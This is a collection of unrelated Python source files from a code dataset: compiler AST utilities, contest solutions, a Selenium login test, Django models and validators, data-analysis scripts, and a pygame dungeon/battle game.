    return s
class astnode():
    """Interior AST node: a function name plus child nodes/tokens.

    Python 2 module: __repr__ indexes the result of map(), which is only
    a list on Python 2.
    """
    def __init__(self, fun, args, fil='', line=0, char=0):
        self.fun = detokenify(fun)
        self.args = args
        self.metadata = [self.fil, self.line, self.char] = fil, line, char
        # Nested-list form of the subtree: [fun, child1, child2, ...].
        self.listfy = lambda: [self.fun] + map(lambda x: x.listfy(), self.args)
    def __repr__(self):
        """Pretty-print as an s-expression, wrapping at 80 columns and
        always breaking 'seq' nodes one child per line."""
        o = '(' + self.fun
        subs = map(repr, self.args)
        k = 0
        out = ' '
        # Pack as many short children as fit on the first line.
        while k < len(subs) and o != '(seq':
            if '\n' in subs[k] or len(out + subs[k]) >= 80:
                break
            out += subs[k] + ' '
            k += 1
        if k < len(subs):
            # Remaining children go on their own indented lines.
            o += out + '\n  '
            o += '\n'.join(subs[k:]).replace('\n', '\n  ')
            o += '\n)'
        else:
            o += out.rstrip() + ')'
        return o
def nodeify(s, fil='', line=0, char=0):
    """Recursively convert a nested-list AST into astnode/token objects.

    Python 2 module: relies on the `unicode` and `long` builtins.
    """
    if isinstance(s, astnode):
        # Rebuild an existing node so its children are normalized too.
        metadata = s.metadata
        fun = s.fun
        nodes = map(lambda x: nodeify(x, *s.metadata), s.args)
    elif isinstance(s, (token, str, unicode, int, long)):
        # Atoms become (or stay) tokens.
        return tokenify(s)
    else:
        # A list/tuple: first element is the function, rest are children.
        metadata = fil, line, char
        fun = s[0].val if isinstance(s[0], token) else s[0]
        nodes = map(lambda x: nodeify(x, *metadata), s[1:])
    return astnode(fun, nodes, *metadata)
# Type predicates (Python 2: `long` and `unicode` exist only there).
is_numeric = lambda x: isinstance(x, (int, long))
is_string = lambda x: isinstance(x, (str, unicode))
# A set of methods for detecting raw values (numbers and strings) and
# converting them to integers
def frombytes(b):
    """Interpret *b* as a big-endian byte string and return its integer
    value ('' -> 0)."""
    total = 0
    for ch in b:
        total = total * 256 + ord(ch)
    return total
def fromhex(b):
    """Parse a lowercase hex string to an integer ('' -> 0).

    Unknown characters contribute -1 per digit, mirroring the original's
    use of str.find.
    """
    digits = '0123456789abcdef'
    total = 0
    for ch in b:
        total = total * 16 + digits.find(ch)
    return total
def is_numberlike(b):
    """True when numberize() can handle *b*: a digits/dashes string, a
    quoted string literal, or 0x-prefixed hex.  Non-strings are False.
    (Python 2 module: also accepts `unicode` strings.)"""
    if not isinstance(b, (str, unicode)):
        return False
    if re.match(r'^[0-9\-]*$', b):
        return True
    if b[0] in ("'", '"') and b[-1] in ("'", '"') and b[0] == b[-1]:
        return True
    return b[:2] == '0x'
def log256(x):
    """Number of base-256 digits needed to represent x (0 -> 0).

    Bug fix: uses floor division (//).  With `/` the recursion produced
    floats on Python 3 and recursed far past the correct depth; `//` is
    identical to `/` for non-negative ints on Python 2.
    """
    return 0 if x == 0 else (1 + log256(x // 256))
def tobytearr(n, L):
    """Encode n as a list of L big-endian byte values (0-255).

    Bug fix: uses floor division (//); with `/` the recursion produced
    floats on Python 3.  `//` matches `/` for non-negative ints on
    Python 2.
    """
    return [] if L == 0 else tobytearr(n // 256, L - 1) + [n % 256]
def numberize(b):
    """Convert a raw value to an int: ints pass through, quoted strings
    become their big-endian byte value, 0x strings parse as hex, and
    anything else parses as decimal."""
    if is_numeric(b):
        return b
    if b[0] in ("'", '"'):
        return frombytes(b[1:-1])
    if b[:2] == '0x':
        return fromhex(b[2:])
    return int(b)
|
23,156 | b662b5186fe71299a0515710f9ffa0f6141a3727 | #coding: utf8
import math
import copy
import sys
def printe(inp):
    """Debug-print repr(inp) to stderr (stdout may be redirected to the
    judge's output file)."""
    sys.stderr.write('%s\n' % repr(inp))
    #sys.stderr.flush()
def readline():
    # Read one whitespace-separated line of ints from stdin.
    # Python 2 only: raw_input, and map() returning a list.
    return map(int, raw_input().split())
def solve():
    """For each movie, print the min and max possible favorite-actor
    counts (0 entries in the cast are unknown actors).  Python 2 only."""
    m, k = readline()
    favorite = set(readline())
    n = int(raw_input())
    # NOTE(review): these pre-loop initialisations are dead — every name
    # is reassigned at the top of each iteration.
    l_name = []
    n_actors = []
    ind_actors = []
    min_fav_actors = []
    max_fav_actors = []
    for i in range(n):
        l_name = raw_input()
        n_actors = int(raw_input())
        ind_actors = readline()
        # num_zero is unused; the count(0) is recomputed below.
        num_zero = ind_actors.count(0)
        # Known favorites in the cast = guaranteed minimum; each unknown
        # (0) actor could be a favorite, giving the maximum.
        min_fav_actors = len(favorite & set(ind_actors))
        max_fav_actors = min_fav_actors + ind_actors.count(0)
        printe([min_fav_actors, max_fav_actors])
if __name__ == '__main__':
    # Judge-style I/O: use input.txt/output.txt when present, otherwise
    # fall back to stdin/stdout.
    try:
        f_in = open("input.txt")
        f_out = open("output.txt", 'w')
        FLAG_FILE = True
    except IOError:
        FLAG_FILE = False
    else:
        sys.stdin = f_in
        sys.stdout = f_out
    solve()
    if FLAG_FILE:
        f_in.close()
        f_out.close()
|
# Abbreviation -> expansion lookup.  A dict replaces the inner linear scan
# over two parallel lists (O(1) lookup, pairs kept together).
inp = ['E', 'C', 'N', 'U', 'Impossible', 'ACM']
ou = ['Excellent', 'Cheer', 'Nice', 'Ultimate', "I'm possible", 'Accept More']
expansion = dict(zip(inp, ou))
for _ in range(int(input())):
    word = input()
    # As before, unknown words print nothing.
    if word in expansion:
        print(expansion[word])
|
23,158 | 70683fae9d3f19326a4af780feaf99ec9c731bbe | import time
from selenium import webdriver
# Browser exposes an executable files
# Selenium test will invoke this executable file and with help of this we can automatically invoke browser
from selenium.webdriver.chrome.webdriver import WebDriver
# Path to the local chromedriver binary (Windows-specific).
driver: WebDriver = webdriver.Chrome(executable_path="C:\\chromedriver_win32\\chromedriver.exe")
#maximize browser
driver.maximize_window()
driver.get("https://stage-www.keyflow.com/en/profile/login")
print(driver.title)
print(driver.current_url)
#Enter data to the textboxes
# SECURITY NOTE(review): test credentials are hardcoded here; consider
# moving them to environment variables or a config outside the repo.
driver.find_element_by_name("phone").send_keys("+46761177777")
driver.find_element_by_name("password").send_keys("testerQA123")
driver.find_element_by_tag_name("BUTTON").click()
#Click on profile
# NOTE(review): fixed sleep is flaky; an explicit WebDriverWait would be
# more reliable.
time.sleep(5)
Var = driver.find_element_by_xpath("//header/div[1]/div[2]/nav[1]/ul[1]/li[4]/div[1]/div[3]/div[1]/figure[1]/div[1]").click()
print(driver.current_url)
#To fetch age from profile page
print(driver.find_element_by_xpath("//html[1]/body[1]/div[1]/div[1]/div[2]/div[2]/div[1]/h1[1]").text)
#//body/div[@id='app']/div[1]/div[2]/div[2]/div[1]/h1[1]
23,159 | 3452b463c8616f1058daebe5d6186c3beaf62390 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2019/8/11 2:14 PM
from django.db import models
class Tweet(models.Model):
    """A 140-character tweet with a simple moderation workflow
    (pending -> published | rejected)."""
    text = models.CharField(max_length=140)
    author_email = models.CharField(max_length=200)
    created_at = models.DateTimeField(auto_now_add=True)
    published_at = models.DateTimeField(null=True)
    STATE_CHOICES = (
        ('pending', 'pending'),
        ('published', 'published'),
        ('rejected', 'rejected'),
    )
    state = models.CharField(max_length=15, choices=STATE_CHOICES)
    def __unicode__(self):
        return self.text
    # Bug fix: this was `def Meta(self):`, a method Django never calls, so
    # the custom permission was silently ignored.  Meta must be an inner
    # class, and `permissions` a tuple OF tuples (note the trailing comma).
    class Meta:
        permissions = (
            ("can_approve_or_reject_tweet",
             "Can approve or reject tweets"),
        )
class Comment(models.Model):
    """A comment attached to a tweet."""
    tweet = models.ForeignKey(Tweet)
    text = models.CharField(max_length=300)
    created_at = models.DateTimeField(auto_now_add=True)
    def __unicode__(self):
        return self.text
23,160 | 98ff7263e73a04cbeb77cd19ee9cfd43b2742fdd | import pdb
import json
from collections import Counter, defaultdict
# Histograms: polygon-point-count -> number of annotations with that count.
num_of_point_in_mcg_json = defaultdict(int)
num_of_point_in_coco_json = defaultdict(int)
# Pass 1: MCG-generated pseudo-annotations.
with open("datasets/coco/annotations/coco_train_mcg.json") as f:
    myjson = json.load(f)
annotations = myjson["annotations"]
print("There are totoal {0} annotations".format(len(annotations)))
# error_idx = []
for i, ann in enumerate(annotations):
    # Only the first polygon of each annotation is measured.
    num = len(ann["segmentation"][0])
    num_of_point_in_mcg_json[num] += 1
    # if num < 6: # less than 6 point will cause error
    #     error_idx.append(i)
# Pass 2: official COCO instance annotations, skipping crowd (RLE) ones.
with open("datasets/coco/annotations/instances_train2017.json") as f:
    myjson = json.load(f)
annotations = myjson["annotations"]
print("There are totoal {0} annotations".format(len(annotations)))
for i, ann in enumerate(annotations):
    if ann["iscrowd"] == 1:
        continue
    # if isinstance(ann["segmentation"], list):
    num = len(ann["segmentation"][0])
    num_of_point_in_coco_json[num] += 1
    # else:
    #     pdb.set_trace()
    #     print(ann)
#print(dict(sorted(num_of_point_in_coco_json.items())))
import pprint
pp = pprint.PrettyPrinter(indent=4)
# NOTE(review): "totoal" typo in the printed messages above; left as-is
# since these are runtime strings.
print("num_of_point_in_mcg_json:")
print(dict(sorted(num_of_point_in_mcg_json.items())))
pp.pprint(num_of_point_in_mcg_json)
print("num_of_point_in_coco_json:")
print(dict(sorted(num_of_point_in_coco_json.items())))
pp.pprint(num_of_point_in_coco_json)
# pdb.set_trace()
23,161 | 8aedb5175be63397efe3b17c09d49cce875f1bb6 | from __future__ import unicode_literals
# Date-based package version: YYYY.MM.DD.
__version__ = '2015.12.13'
|
23,162 | 5a65ad26f1279821ae2519062d01e263ff901874 | from __future__ import division, print_function
import pickle
import os
# abc_background reads these environment variables at import time; set
# placeholder values so the import below succeeds outside the batch job.
os.environ["JSON_GLOB"]="null"
os.environ["PICKLE_GLOB"]="null"
os.environ["USE_POSTREFINE"]="null"
os.environ["MODEL_MODE"]="null"
from LS49.work2_for_aca_lsq.abc_background import fit_roi_multichannel # implicit import
from scitbx.array_family import flex
# Per-image pickle paths for the two refinement protocols being compared.
abc_glob_dials_refine = "/global/cscratch1/sd/nksauter/proj-paper1/work/abc_coverage_dials_refine/abcX%06d.pickle"
abc_glob_pixel_refine = "/global/cscratch1/sd/nksauter/proj-paper1/work/abc_coverage_pixel_refine/abcX%06d.pickle"
from scitbx.matrix import col
deltafast = flex.double()  # per-spot fast-axis centroid shifts (pixels)
deltaslow = flex.double()  # per-spot slow-axis centroid shifts (pixels)
from matplotlib import pyplot as plt
ikeys = flex.int()    # keys parsed from the log (tokens[2] of "LLG" lines)
ang2 = flex.double()  # angular reset no. 2
ang3 = flex.double()  # angular reset no. 3
# Scrape the angular resets out of the SLURM job log: on lines containing
# "LLG", tokens 22/23 hold ang2/ang3 with one trailing character sliced off.
with open("slurm22693509.out","r") as F:
    for line in F:
        if "LLG" in line:
            tokens = line.split()
            ikeys.append( int(tokens[2]) )
            ang2.append( float(tokens[22][:-1]) )
            ang3.append( float(tokens[23][:-1]) )
# Convert from hundredths of a degree to degrees.
ang2*=0.01
ang3*=0.01
statsang2 = flex.mean_and_variance(ang2)
print("Ang2 stats, mean, stddev=",statsang2.mean(),
      statsang2.unweighted_sample_standard_deviation(),"on N=",len(ang2))
statsang3 = flex.mean_and_variance(ang3)
print("Ang3 stats, mean, stddev=",statsang3.mean(),
      statsang3.unweighted_sample_standard_deviation())
fig, ax = plt.subplots()
# the histogram of the data
n, bins, patches = ax.hist(ang2, bins=40, normed=0, histtype="step", range=(-0.04,0.04), color='blue')
n, bins, patches = ax.hist(ang3, bins=40, normed=0, histtype="step", range=(-0.04,0.04), color='red')
ax.set_xlabel('Angular reset (degrees)')
ax.set_ylabel('Count')
ax.set_title(r'Histogram of angle2, 3 rotational shift')
# commented code for scatter plot
#plt.plot(deltaslow,deltafast,"b,")
#plt.axes().set_aspect("equal")
plt.show()
exit()
# ---------------------------------------------------------------------------
# NOTE: everything below is unreachable (see exit() above) -- an older
# analysis comparing spot centroids between the dials- and pixel-refined
# pickles and histogramming the fast/slow shifts. Kept for reference.
# ---------------------------------------------------------------------------
for key in range(10000):
    print(key)
    try:
        pixel = pickle.load(open(abc_glob_pixel_refine%key,"rb"))
        dials = pickle.load(open(abc_glob_dials_refine%key,"rb"))
    except IOError:
        continue
    assert len(pixel) == len(dials)
    for ispot in range(len(pixel)):
        dials_roi = dials[ispot].roi
        pixel_roi = pixel[ispot].roi
        focus = dials_roi.focus()
        S = flex.double(range(focus[0]))
        F = flex.double(range(focus[1]))
        # matrix giving the slow coordinate:
        cslow = S.matrix_outer_product(flex.double([1]*focus[1]))
        # matrix giving the fast coordinate:
        cfast = flex.double([1]*focus[0]).matrix_outer_product(F)
        # Intensity-weighted centroid (expectation value) of each ROI.
        sum_dials_roi = flex.sum(dials_roi)
        dials_expectation_value = col( ( flex.sum(cfast*dials_roi)/sum_dials_roi ,
                                         flex.sum(cslow*dials_roi)/sum_dials_roi ) )
        sum_pixel_roi = flex.sum(pixel_roi)
        pixel_expectation_value = col( ( flex.sum(cfast*pixel_roi)/sum_pixel_roi ,
                                         flex.sum(cslow*pixel_roi)/sum_pixel_roi ) )
        delta_position = pixel_expectation_value - dials_expectation_value
        deltafast.append(delta_position[0])
        deltaslow.append(delta_position[1])
        print (delta_position.elems)
        #from IPython import embed; embed()
statss = flex.mean_and_variance(deltaslow)
print("Slow axis stats, mean, stddev=",statss.mean(), statss.unweighted_sample_standard_deviation(),"on N=",len(deltaslow))
statsf = flex.mean_and_variance(deltafast)
print("Fast axis stats, mean, stddev=",statsf.mean(), statsf.unweighted_sample_standard_deviation())
fig, ax = plt.subplots()
# the histogram of the data
n, bins, patches = ax.hist(deltaslow, bins=40, normed=0, histtype="step", range=(-2.0,2.0), color='blue')
n, bins, patches = ax.hist(deltafast, bins=40, normed=0, histtype="step", range=(-2.0,2.0), color='red')
ax.set_xlabel('spot shift (pixels)')
ax.set_ylabel('Count')
ax.set_title(r'Histogram of slow, fast pixel shift')
# commented code for scatter plot
#plt.plot(deltaslow,deltafast,"b,")
#plt.axes().set_aspect("equal")
plt.show()
23,163 | 7ed36693b685a8125771de4795998cb715e36b12 | from django.core.exceptions import ValidationError
from django.conf import settings
from django.utils.translation import gettext_lazy as _
from django.utils import timezone
"""
Utils file to save common validators
"""
def val_future_time(value):
    """Validate that *value* lies in the future.

    Raises ValidationError when *value* is earlier than the current time.
    """
    now = timezone.now()
    if value < now:
        raise ValidationError('Datetime should be a future Date and time')
def val_future_end_time(value):
    """Validate an interview end time.

    The end time must be at least ``settings.MIN_INTERVIEW_DURATION`` minutes
    after now(); otherwise a ValidationError is raised.
    """
    earliest_allowed = timezone.now() + timezone.timedelta(minutes=settings.MIN_INTERVIEW_DURATION)
    if value < earliest_allowed:
        raise ValidationError(f'Datetime should be atleast {settings.MIN_INTERVIEW_DURATION} min after current Date and time')
|
23,164 | f77fb1200133551ecf0f1767356e9abf8f176985 | import pygame, math, sys
from pygame.font import SysFont
import random
from pygame.locals import *
from sprites import *
from players import *
from singleton import Singleton
SCREEN_H = 1024  # NOTE(review): the window is created as (SCREEN_W, SCREEN_H) = 768x1024, i.e. portrait -- confirm H/W are not swapped
SCREEN_W = 768
# Sprite sheet containing all tiles and the player sprite.
spritePath = '225842_hyptosis_sprites-and-tiles-for-you.png'
TILE_W = TILE_H = 32  # tile size in pixels
clock = pygame.time.Clock()
k_up = k_down = k_left = k_right = 0
direction = 0
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
# Map dimensions, stored as the maximum index (grid size - 1).
TILES_ACROSS = 5 - 1
TILES_DOWN = 5 - 1
PLAYER_START_X = PLAYER_START_Y = 1
# Tile/block type ids stored in Map.map.
BLOCK_DARKNESS = 0
BLOCK_PLAYER = 1
BLOCK_FLOOR = 2
BLOCK_WALL = 3
BLOCK_TRAP = 4
@Singleton
class DisplayDevice:
    """Process-wide holder for the pygame display surface."""

    def setScreen(self, screen):
        """Remember the surface returned by pygame.display.set_mode()."""
        self.screen = screen

    def getScreen(self):
        """Return the surface previously stored with setScreen()."""
        return self.screen
class Scene(object):
    """Abstract base for game scenes; subclasses implement the three hooks."""

    def __init__(self):
        pass

    def eraseScreen(self, screen):
        """Blank the whole surface to black."""
        screen.fill((0, 0, 0))

    def render(self, screen):
        raise NotImplementedError

    def update(self):
        raise NotImplementedError

    def handle_events(self, events):
        raise NotImplementedError
#states:
class InteractiveElementHandler(object):
    """Routes clicks on one interactive element to the handlers that accept it."""

    def __init__(self, obj):
        print("saving %s" % (obj,))
        self.obj = obj
        self.handlers = [ SkillHandler(obj) ]

    def eligibleFor(self, object):
        # Parameter name kept for backward compatibility even though it
        # shadows the builtin.
        """Return True when *object* is the element this handler was built for."""
        print("check eligibility for %s" % object)
        # BUG FIX: the old loop iterated self.handlers but compared
        # id(self.obj) to id(object) without ever using the handler -- it was
        # just an identity check repeated per handler.  self.handlers is
        # always non-empty (see __init__), so this is behavior-preserving.
        return self.obj is object

    def handle(self, object):
        for handler in self.handlers:
            if self.eligibleFor(object):
                print("Handle from InteractiveElementHandler %s, %s, %s" % ( id(self.obj), id(object), self.obj.name ))
                handler.handle()
class SkillHandler(object):
    # Drives the lifecycle of a skill activation via a small state machine.
    def __init__(self, skill):
        self.skill = skill
        self.objectType = skill.appliesTo()  # target category this skill accepts
        self.states = [ 'PICK_TARGET', 'APPLY_EFFECT', 'ADD_TO_STACK' ]
        self.state = 'PICK_TARGET'
    def handle(self):
        # NOTE(review): each state is checked with an independent `if` and the
        # state is never advanced here -- only the branch matching the initial
        # 'PICK_TARGET' state ever runs. Confirm whether transitions belong here.
        if self.state == 'PICK_TARGET':
            print "Pick target for a skill"
            #scene.setTargetsForPicking(targets)
        if self.state == 'APPLY_EFFECT':
            print "Display effect animation"
        if self.state == 'ADD_TO_STACK':
            print "Add effect to stack"
        print "handling from skillHandler"
        #pickTarget if eligible
        #applySkillEffect
        #if duration > 0 : add to effect stack
        pass
    def pickTarget(self):
        # Skeleton: a finite max-target skill would register a target picker.
        if self.skill.maxTargets() < 100:
            #register target picker
            pass
        pass
    def applySkillEffect(self):
        pass
    def eligibleFor(self, object):
        # A skill is eligible for targets of the category it applies to.
        return object.appliesTo() == self.objectType
    def handle_events(self, events):
        # NOTE(review): SkillHandler defines no handle_mouse -- this would
        # raise AttributeError on the first MOUSEBUTTONDOWN event.  These two
        # lines look copied from a scene class; confirm where they belong.
        for event in events:
            if event.type == pygame.MOUSEBUTTONDOWN:
                print "Got mouse down"
                self.handle_mouse(event)
class SceneMananger(object):
    """Owns the active scene and performs scene transitions."""

    def __init__(self):
        # Start directly in a battle (development default).
        self.go_to(BattleScene(getBattleEntities()))

    def go_to(self, scene):
        """Make *scene* current and give it a back-reference to this manager."""
        self.scene = scene
        self.scene.manager = self
class BattleScene(Scene):
    """Turn-based battle screen: draws the initiative order, party, enemies
    and the active character's skill bar, and routes clicks to skill handlers."""

    def __init__(self, entities):
        super(BattleScene, self).__init__()
        self.entities = entities
        # category name -> list of {'collision': Rect, 'object': entity/skill}
        # used for mouse hit-testing (rebuilt by the draw* methods each frame).
        self.interactiveElements = {}
        self.fontPlayer = pygame.font.SysFont("Arial",13)
        self.screen = DisplayDevice.Instance().getScreen()
        self.eraseScreen(self.screen)
        self.handlers = {}  # id(skill) -> InteractiveElementHandler
        self.totalPlayers = 0
        self.totalEnemies = 0
        self.buildInitiativeSequence()
        self.activeCharacterIndex = 0  # index into self.sequence (whose turn it is)

    def buildInitiativeSequence(self):
        # Count players/monsters and sort entity indices by initiative, descending.
        self.sequence = []
        index = 0
        for e in self.entities:
            if e.type == 'player':
                self.totalPlayers = self.totalPlayers + 1
            if e.type == 'monster':
                self.totalEnemies = self.totalEnemies + 1
            self.sequence.append( { "index": index, "initiative": e.initiative } )
            index = index + 1
        self.sequence = sorted(self.sequence, key = lambda k: k['initiative'], reverse=True)

    def drawSequence(self, screen):
        # Draw the initiative order as a row of boxes; the active one is highlighted.
        startX = 30
        startY = 200
        offsetX = 10
        playerBoxWidth = 60
        playerBoxHeight = 30
        idx = 0
        color = (50, 100, 100)
        activeColor = (200, 10, 10)
        for seq in self.sequence:
            useColor = color
            if idx == self.activeCharacterIndex:
                useColor = activeColor
            xLeft, yLeft = (startX + playerBoxWidth * idx + offsetX * idx, startY)
            pygame.draw.rect(screen, useColor,
                pygame.Rect(
                    xLeft, yLeft,
                    playerBoxWidth, playerBoxHeight),
                1)
            # draw active player border
            text = self.fontPlayer.render( self.entities[seq['index']].name, True, (255, 255, 255))
            screen.blit(text, (xLeft + 1, yLeft + playerBoxHeight * .8))
            idx = idx + 1

    def getActiveCharacter(self):
        # Entity whose turn it currently is.
        return self.entities[ self.sequence[self.activeCharacterIndex]['index'] ]

    def getPrevActiveCharacter(self):
        # Step the turn pointer backwards, wrapping around; returns the sequence entry.
        self.activeCharacterIndex = self.activeCharacterIndex - 1
        if self.activeCharacterIndex < 0:
            self.activeCharacterIndex = (self.totalPlayers + self.totalEnemies) - 1
        return self.sequence[self.activeCharacterIndex]

    def getNextActiveCharacter(self):
        # Step the turn pointer forwards, wrapping around; returns the sequence entry.
        self.activeCharacterIndex = self.activeCharacterIndex + 1
        if self.activeCharacterIndex >= (self.totalPlayers + self.totalEnemies):
            self.activeCharacterIndex = 0
        return self.sequence[self.activeCharacterIndex]

    def drawPlayer(self, screen, obj):
        # Draw the party boxes and register their rects for click hit-testing.
        self.interactiveElements['player'] = []
        startX = 30
        startY = 300
        offsetX = 10
        playerBoxWidth = 50
        playerBoxHeight = 80
        idx = 0
        color = (50, 100, 100)
        activeColor = (200, 10, 10)
        for o in obj:
            useColor = color
            if o == self.getActiveCharacter():
                useColor = activeColor
            xLeft, yLeft = (startX + playerBoxWidth * idx + offsetX * idx, startY)
            rect = pygame.Rect(xLeft, yLeft,playerBoxWidth, playerBoxHeight)
            pygame.draw.rect(screen, useColor, rect,1)
            self.interactiveElements['player'].append(
                {
                    'collision': rect, 'object': o
                }
            )
            # draw active player border
            text = self.fontPlayer.render(o.name, True, (255, 255, 255))
            screen.blit(text, (xLeft + 1, yLeft + playerBoxHeight * .8))
            idx = idx + 1
        # draw players name

    def drawEnemy(self, screen, obj):
        # Same as drawPlayer but for monsters, offset to the right side.
        self.interactiveElements['monsters'] = []
        startX = 330
        startY = 300
        offsetX = 10
        playerBoxWidth = 50
        playerBoxHeight = 80
        idx = 0
        color = (50, 100, 100)
        activeColor = (200, 10, 10)
        for o in obj:
            useColor = color
            if o == self.getActiveCharacter():
                useColor = activeColor
            xLeft, yLeft = (startX + playerBoxWidth * idx + offsetX * idx, startY)
            rect = pygame.Rect(xLeft, yLeft,playerBoxWidth, playerBoxHeight)
            pygame.draw.rect(screen, useColor,rect,1)
            self.interactiveElements['monsters'].append(
                {
                    'collision': rect, 'object': o
                }
            )
            # draw active player border
            text = self.fontPlayer.render(o.name, True, (255, 255, 255))
            screen.blit(text, (xLeft + 1, yLeft + playerBoxHeight * .8))
            idx = idx + 1

    #draw availableSkills
    def drawEntitySkills(self, screen, entity):
        # Draw the active entity's skill buttons and lazily create their handlers.
        self.interactiveElements['skillButtons'] = []
        idx = 0
        color = (100,100,100)
        xLeft = 30
        yLeft = 400
        skillBoxWidth = 80
        skillBoxHeight = 40
        # erase old stuff
        pygame.draw.rect(screen, (100,0,0),
            pygame.Rect(
                xLeft, yLeft,
                200, 40),
            )
        for skill in entity.skills:
            # NOTE(review): xLeft grows by width*idx each pass, so gaps widen
            # quadratically -- confirm this layout is intended.
            xLeft = xLeft + skillBoxWidth * idx
            rect = pygame.Rect(xLeft, yLeft,skillBoxWidth, skillBoxHeight)
            pygame.draw.rect(screen, color,rect,1)
            self.interactiveElements['skillButtons'].append(
                {
                    'collision': rect,
                    'object': skill
                }
            )
            if id(skill) not in self.handlers:
                h = InteractiveElementHandler(skill)
                self.handlers[id(skill)] = h
            text = self.fontPlayer.render(skill.name, True, (255, 255, 255))
            screen.blit(text, (xLeft + 1, yLeft + skillBoxHeight * .6))
            idx = idx + 1

    def handle_events(self, events):
        #wait for combat actions
        for event in events:
            #for handler in self.handlers:
            #    if handler.handle(event): #intercept event by handler, if possible
            #        return
            # Left/right arrows cycle the active character.
            if hasattr(event, 'key'):
                if event.type == pygame.KEYDOWN:
                    if event.key == K_LEFT: self.getPrevActiveCharacter()
                    if event.key == K_RIGHT: self.getNextActiveCharacter()
                    if event.key == K_UP: continue
                    if event.key == K_DOWN: continue
            if event.type == pygame.MOUSEBUTTONDOWN:
                print "Got mouse down"
                self.handle_mouse(event)
        pass

    def handle_mouse(self, event):
        # Hit-test the click against every registered rect and notify every
        # handler that accepts the clicked object.
        for objTypes in self.interactiveElements:
            for obj in self.interactiveElements[objTypes]:
                if obj['collision'].collidepoint(event.pos):
                    print "Collision detected at %s with %s" % (event.pos , obj['object'])
                    for k, handler in self.handlers.iteritems() :
                        handler.handle(obj['object'])

    def update(self):
        pass

    def render(self, screen):
        # Redraw the whole battle UI for this frame.
        enemies = []
        players = []
        for e in self.entities:
            if e.type == 'player':
                players.append(e)
            if e.type == 'monster':
                enemies.append(e)
        self.drawPlayer(screen, players)
        self.drawEnemy(screen, enemies)
        self.drawSequence(screen)
        self.drawEntitySkills(screen, self.getActiveCharacter() )
        # Status bar background and caption.
        pygame.draw.rect(screen, (10,10,250),
            pygame.Rect(
                30, 500,
                500, 100),
            )
        text = self.fontPlayer.render("Current active is %s" % self.getActiveCharacter().name, True, (255, 255, 255))
        screen.blit(text, (30, 500))
        #Render player
        #Render enemy
        #Render combat interface
        pass
class DungeonScene(Scene):
    """Tile-based dungeon exploration: rooms are generated lazily as the
    player walks into unexplored darkness."""

    def __init__(self, levelId):
        super(DungeonScene, self).__init__()
        self.screen = DisplayDevice.Instance().getScreen()
        #load sprites from sheet
        self.loadTiles()
        self.textBuffer = []  # messages to display on the next render
        self.clock = pygame.time.Clock()
        self.direction = 0
        self.position = (PLAYER_START_X, PLAYER_START_Y)  # player tile coords
        self.map = Map()
        # Make sure the starting tile is walkable.
        self.map.map[PLAYER_START_X][PLAYER_START_Y] = BLOCK_FLOOR
        self.init_text()

    def move(self, hor, vert):
        # Try to move the player by (hor, vert) tiles; generates the target
        # room (and its neighbours) on demand and refuses walls/out-of-bounds.
        x, y = self.position
        x = x + hor
        y = y + vert
        if x > TILES_ACROSS or x < 0 or y > TILES_DOWN or y < 0:
            return
        self.map.generateRoomIfNotGenerated( (x,y) )
        if self.map.isTraversable((x,y)):
            self.map.generateRoomsAroundCoords( (x, y) )
            self.position = (x, y)
            self.screen.blit(self.bg, (0, 0))

    def handle_events(self, events):
        # Translate arrow keys into a single move per frame.
        hor = 0
        vert = 0
        for event in events:
            if not hasattr(event, 'key'): continue
            if event.type == pygame.KEYDOWN:
                if event.key == K_LEFT: hor = -1
                if event.key == K_RIGHT: hor = 1
                if event.key == K_UP: vert = -1
                if event.key == K_DOWN: vert = 1
        # TODO: sync text display with player movement
        self.move(hor, vert)
        # self.map.print_ascii_map()

    def init_text(self):
        self.myfont = pygame.font.Font(None,15)

    def loadTiles(self):
        # Cut the player/floor/wall/trap tiles out of the sprite sheet.
        self.spriteSheet = spritesheet(spritePath)
        #self.player = self.spriteSheet.image_at((424, 818, TILE_W , TILE_H ), colorkey=-1)
        self.player = self.spriteSheet.image_at((13*TILE_W + 8, 25*TILE_H+16 , TILE_W, TILE_H ),colorkey=-1)
        self.player.convert_alpha()
        self.bg = self.spriteSheet.image_at((0, 0, TILE_W , TILE_H ))
        self.tileFloor = self.spriteSheet.image_at((13*TILE_W+8, 22*TILE_H+16, TILE_W, TILE_H ))
        self.tileWall = self.spriteSheet.image_at((13*TILE_W+8, 21*TILE_H+16, TILE_W, TILE_H ))
        self.tileTrap = self.spriteSheet.image_at((15*TILE_W+8, 22*TILE_H+16, TILE_W, TILE_H ))

    def update(self):
        pass

    def render(self, screen):
        self.draw_Text(
            self.textBuffer,
            (300, 300),
            screen
        )
        self.redraw_map_tiles(screen)
        #TRANSPARENCY IS SOMEWHERE AROUND
        self.draw_PlayerTile(screen)

    ''' Render part '''
    def redraw_map_tiles(self, screen):
        # Blit the tile image matching each map cell's block id.
        #print self.map.map.__len__()
        for row in range(TILES_ACROSS + 1):
            for col in range(TILES_DOWN + 1):
                if self.map.map[row][col] == BLOCK_DARKNESS:
                    pygame.draw.rect(screen, BLACK, (row * TILE_W, col * TILE_H, TILE_W, TILE_H))
                if self.map.map[row][col] == BLOCK_FLOOR:
                    screen.blit(self.tileFloor, Map.convertTileToCoords( (row, col) ) )
                if self.map.map[row][col] == BLOCK_TRAP:
                    screen.blit(self.tileTrap, Map.convertTileToCoords( (row, col) ) )
                if self.map.map[row][col] == BLOCK_WALL:
                    screen.blit(self.tileWall, Map.convertTileToCoords( (row, col) ) )

    def draw_PlayerTile(self, screen):
        screen.blit(self.player, Map.convertTileToCoords( self.position) )
        #print "Drawing player at %s, %s" % (self.position)

    #TODO: add text wrapper
    def draw_Text(self,text, coords, screen):
        # Render the buffered messages joined on one line, then clear the buffer.
        # NOTE(review): the *text* parameter is immediately overwritten -- the
        # buffer is the real data source; confirm the parameter can be dropped.
        x, y = coords
        text = ""
        for textString in self.textBuffer:
            text += textString + ". "
        label = self.myfont.render(text, 1, (255,255,255))
        emptySurface = pygame.Surface( (200,200) )
        emptySurface.fill((0,0,0))
        screen.blit(emptySurface, (x, y))
        screen.blit(label, (x, y))
        self.textBuffer = []
class TitleScene(object):
    """Start screen; waits for SPACE and then enters the dungeon."""

    def __init__(self):
        super(TitleScene, self).__init__()
        self.font = pygame.font.SysFont('Arial', 56)
        self.sfont = pygame.font.SysFont('Arial', 32)

    def render(self, screen):
        """Draw the prompt on a near-black background."""
        screen.fill((10, 10, 10))
        prompt = self.font.render('> press space to start <', True, (255, 255, 255))
